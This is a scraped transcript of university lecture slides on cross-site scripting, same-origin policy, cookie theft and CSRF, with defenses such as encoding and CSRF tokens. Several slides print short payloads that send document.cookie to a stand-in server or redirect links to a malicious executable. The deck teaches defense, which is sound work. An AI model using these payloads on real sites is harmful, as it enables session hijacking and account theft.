Presentation is loading. Please wait.

Presentation is loading. Please wait.

EECS 354 Network Security Cross Site Scripting (XSS)

Published byGrace Butler Modified over 9 years ago

Similar presentations

Presentation on theme: "EECS 354 Network Security Cross Site Scripting (XSS)"— Presentation transcript:

1 EECS 354 Network Security Cross Site Scripting (XSS)

2 Web Application Design Modern web pages are complex Server side Web servers, backend code, databases Client side Web browsers parse HTML, execute Javascript Rich content: Java applets, Flash objects

3 Web Application Security Server side attacks Attacking the host server to steal data, even root a box SQL injection to read arbitrary database information Shell attacks, direct object reference, directory traversal, and more Client side attacks

4 Web Application Security Server side attacks Client side attacks Exploiting users’ trust in their browser Javascript attacks on other clients Cross-Site Scripting (XSS) Cross-Site Request Forgery (CSRF)

5 Browser Basics Document Object Model (DOM) An interface to access HTML elements dynamically Commonly referenced in Javascript Very powerful Readable and writable

6 Document Object Model

7 A few common tools: document.GetElementsBy* Returns list of elements with a particular property document.cookie Read cookies associated with current document window.location Read/write document location.innerHTML Read/write an element’s HTML content

8 Same Origin Policy Working with iframes A parent window can get a reference to a frame’s document var x = document.getElementById("myframe"); var y = x.contentDocument; document.write(y.cookie); How is this safe for something like ?

9 Demo

10 Same Origin Policy The Same Origin Policy (SOP) protects against certain Javascript attacks Servers can’t read DOM objects across domains Must share scheme, hostname, and port Example: http://www.example.com http://www.example.com/dir/page.html - Success http://www.attacker.com/dir/page.html - Failure

11 Same Origin Policy Prevents an attack like the following: User visits example.com and starts a session User visits malicious.com malicious.com creates an invisible iframe for example.com malicious.com can access document.cookie and HTML content of example.com without the user’s permission

12 Cross Origin Resource Sharing (CORS) Cross Origin Resource Sharing is an explicit exception to the Same Origin Policy Allows DOM access across domains through explicit header For example, logging into Gmail can also log into the embedded Google Chat Implemented through header Access-Control-Allow-Origin: http://mail.google.com

13 XSS Basics Session Stealing Advanced XSS Injection Preventing XSS CSRF

14 Introduction Example A message board has a XSS vulnerability in the message posting A hacker posts a message that contains malicious Javascript code to send passwords to a server When a user visits an exploited page, that user’s password is sent to the hacker

15 The Vulnerability Pages that are susceptible to XSS attacks often allow users to add content to the page Simple attack vectors: webblog comments, message board posting, adding to a wiki Add the following content alert('vulnerable');

16 The Vulnerability Javascript can be extremely dangerous Access to cookies, HTML, and all of the DOM Allows privacy leakage or cookie stealing Redirect to arbitrary pages, cache poisoning for persistence Browsers are not always secure Javascript attacks can lead to full remote code execution through browser vulnerabilities

17 What to do Pages that are vulnerable aren’t helpful unless there’s valuable information to retrieve The most common and easy to steal information is the user’s cookie With a stolen cookie, you’ll often be able to log in as the user using their session

18 XSS Basics Session Stealing Advanced XSS Injection Preventing XSS CSRF

19 Cookies A cookie is data stored on the client that is persistent through requests You log in to access your email (http://u.northwestern.edu/)http://u.northwestern.edu/ The server validates your user name and password then sets a cookie Your browser will send this cookie with subsequent requests to automatically validate your credentials

20 Sessions Sessions allow websites to retain information about a user Session cookies are stored on the client side Contains a unique hash which on the server side refers to a specific account Session cookies should have a short expiration to mitigate attacks

21 Stealing Cookies Use the DOM document.location='http://myserver/savecookie/?cookie='+document.cookie; The browser is redirected to another server that saves the cookie This is very obvious to the user

22 Stealing Cookies How to steal info without user knowing Simple to do with XMLHttpRequest var req = new XMLHttpRequest(); req.open('GET', 'http://www.example.com/?cookie=‘ + document.cookie, false); req.send(); req.responseText; // the response XMLHttpRequests are also subject to SOP Restricts reading the response for a cross domain request

23 Stealing Cookies How to steal info without user knowing Or, an image tag: document.write(“ ”)

24 XSS Basics Session Stealing Advanced XSS Injection Preventing XSS CSRF

25 Attack Vectors Browsers have extremely complicated ways of parsing and rendering a webpage Makes the process open to security holes A standard XSS attack will simply inject script tags into the page There are several more advanced schemes

26 Stored vs Reflected Stored (Persistent) Attack stored on server Becomes part of the website content Affects all who visit the webpage Like a forum post Reflected (Non-persistent) Attack not stored on server A GET parameter used to render the page Only affects users who use an malicious URL

27 Attack Vectors OnLoad, OnError, etc GET parameters http://example.com/index.php?user= alert(%22123%22) And a more malicious example... http://example.com/index.php?user= window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }

28 XSS Basics Session Stealing Advanced XSS Injection Preventing XSS CSRF

29 Protecting against XSS Firewalls ineffective Ports 80 and 443 must be open Sanitize user input Do not allow tags Do not allow tags with Javascript attributes Design sessions well Password should not be recoverable from cookies

30 Encoding Javascript HTML Entity Encoding < to < > to > “ to " Used for embedding special HTML characters as text in the page Rendered safely by the browser HTML Attribute Encoding Replaces characters that are not valid inside HTML attributes Specifically, '&', '<', and '”' are encoded

31 XSS Basics Session Stealing Advanced XSS Injection Preventing XSS CSRF

32 Cross Site Request Forgery Websites use URLs to specify requests for an action Example This image will cause any visitor to make a request to the image source server If bob has his cookie set, visiting a page with this image will allow his account to authenticate and execute the transaction

33 CSRF Requirements A CSRF vulnerability requires: No check of referrer header Form submission with side-effects (the transaction) All necessary form inputs must be known Victim must have an active session with vulnerable site (session cookie) This situation is common in practice

34 CSRF(POST) In reality, no one is going to use HTTP GET for this type of request Risk still exists with HTTP POST User must visit a malicious webpage Malicious site executes CSRF attack on client data at vulnerable site Exploit does not require user input Can use onload() attribute to execute without user permission Name:

35 CSRF Tokens Need a CSRF Token Random nonce (‘number used only once’) that is unpredictable to users CSRF tokens need to be linked with sessions User-specific, only known to that user XSS defeats CSRF tokens and other CSRF protections

36 Backup Slides

37 Browser Plugins Java, Flash player, Quicktime, ActiveX Frequently targeted for attacks Plugins extend the functionality of the web browser Compromise of a plugin is effectively a compromise of the browser, allowing remote code execution Sandboxing can prevent this when implemented effectively

Download ppt "EECS 354 Network Security Cross Site Scripting (XSS)"

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Cross-site Request Forgery (CSRF) Attacks

Cross-site Request Forgery (CSRF) Attacks
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
Cross Site Scripting & SQL injection

Cross Site Scripting & SQL injection
Team Members: Brad Stancel,

Team Members: Brad Stancel,
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz.

Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

Similar presentations

Ads by Google